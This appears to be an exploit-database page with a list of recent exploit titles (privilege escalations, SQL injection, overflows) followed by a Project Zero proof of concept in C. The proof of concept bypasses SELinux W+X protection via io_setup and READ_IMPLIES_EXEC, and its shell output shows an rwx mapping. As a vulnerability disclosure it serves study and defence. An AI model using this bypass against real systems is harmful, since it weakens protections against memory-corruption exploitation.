102574cb3e
5 new exploits EVA-Web 1.1<= 2.2 - (index.php3) Remote File Inclusion EVA-Web 1.1 <= 2.2 - (index.php3) Remote File Inclusion WordPress Plugin Simple Forum 1.10-1.11 - SQL Injection WordPress Plugin Simple Forum 1.10 < 1.11 - SQL Injection Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Perl) Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Perl) Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby) Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby) Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python) Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python) Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4<11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5) Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5) Linux Kernel 2.4.1<2.4.37 / 2.6.1<2.6.32-rc5 - 'pipe.c' Privilege Escalation (3) Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Privilege Escalation (3) Adobe Acrobat Reader 7<9 - U3D Buffer Overflow Adobe Acrobat Reader 7 < 9 - U3D Buffer Overflow Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow (Metasploit) Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit) Mozilla Firefox 7 / 8<= 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit) Mozilla Firefox 7 / 8 <= 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit) Adobe Flash - Crash When Freeing Memory After AVC decoding Adobe Flash - Video Decompression Memory Corruption Linux - SELinux W+X Protection Bypass via AIO Zortam Mp3 Media Studio 21.15 - Insecure File Permissions Privilege Escalation Wise Care 365 4.27 / Wise Disk Cleaner 9.29 - Unquoted Service Path Privilege Escalation Microsoft MSN Messenger 1<4 - Malformed Invite Request Denial of Service Microsoft MSN Messenger 1 < 4 - Malformed Invite Request Denial of Service Kerio Control Unified Threat Management 9.1.0 build 1087_ 9.1.1 build 1324 - Multiple Vulnerabilities Kerio Control Unified Threat Management 9.1.0 build 1087 / 9.1.1 build 1324 - Multiple Vulnerabilities Check Point VPN-1 SecureClient 4.0/4.1 - Policy Bypass Check Point VPN-1 SecureClient 4.0 < 4.1 - Policy Bypass Microsoft Excel 95<2004 - Malformed Graphic File Code Execution Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution Git-1.9.5 - ssh-agent.exe Buffer Overflow Git 1.9.5 - ssh-agent.exe Buffer Overflow Skybox Platform <=7.0.611 - Multiple Vulnerabilities Skybox Platform <= 7.0.611 - Multiple Vulnerabilities SOLIDserver <=5.0.4 - Local File Inclusion SOLIDserver <= 5.0.4 - Local File Inclusion WordPress Plugin DZS Videogallery <=8.60 - Multiple Vulnerabilities WordPress Plugin DZS Videogallery <= 8.60 - Multiple Vulnerabilities Microsoft Windows 7<10 / Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (PowerShell) Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell) Microsoft Windows 7<10 / Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (C#) Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (C#) Microsoft Windows 7<10 / 2008<2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032) Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)
47 lines
No EOL
1.8 KiB
C
Executable file
47 lines
No EOL
1.8 KiB
C
Executable file
/*
|
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=854
|
|
|
|
SELinux has a set of permissions that can be used to prevent processes from creating executable
|
|
memory mappings that contain data controlled by the process (PROCESS__EXECMEM, PROCESS__EXECHEAP, ...).
|
|
These permissions, when applied correctly, make exploitation of memory corruption issues somewhat more
|
|
difficult and much more annoying.
|
|
|
|
When a process tries to map memory using sys_mmap_pgoff(), vm_mmap_pgoff() is called, which first
|
|
performs the LSM security check by calling security_mmap_file() and then calls do_mmap_pgoff(), which
|
|
takes care of the rest and does not rerun the same security check.
|
|
|
|
The syscall handler for io_setup() calls ioctx_alloc(), which calls aio_setup_ring(), which allocates
|
|
memory via do_mmap_pgoff() - the method that doesn't contain the security check.
|
|
|
|
aio_setup_ring() only requests that the memory is mapped as PROT_READ | PROT_WRITE; however, if the
|
|
process has called personality(READ_IMPLIES_EXEC) before, this will actually result in the creation
|
|
of a memory mapping that is both writable and executable, bypassing the SELinux restriction.
|
|
|
|
To verify: (note: I actually tested this without SELinux since the code looks pretty straightforward
|
|
and I don't want to figure out how to set up SELinux rules)
|
|
|
|
$ cat > iosetup.c
|
|
*/
|
|
|
|
#define _GNU_SOURCE
|
|
#include <linux/aio_abi.h>
|
|
#include <unistd.h>
|
|
#include <sys/syscall.h>
|
|
#include <err.h>
|
|
#include <sys/personality.h>
|
|
|
|
int main(void) {
|
|
aio_context_t ctx;
|
|
personality(READ_IMPLIES_EXEC);
|
|
if (syscall(__NR_io_setup, 1, &ctx))
|
|
err(1, "io_setup");
|
|
while (1) pause();
|
|
}
|
|
|
|
/*
|
|
$ gcc -o iosetup iosetup.c
|
|
$ ./iosetup &
|
|
[1] 4949
|
|
$ cat /proc/4949/maps | grep aio
|
|
7fa0b59c6000-7fa0b59c7000 rwxs 00000000 00:0b 36093330 /[aio] (deleted)
|
|
*/ |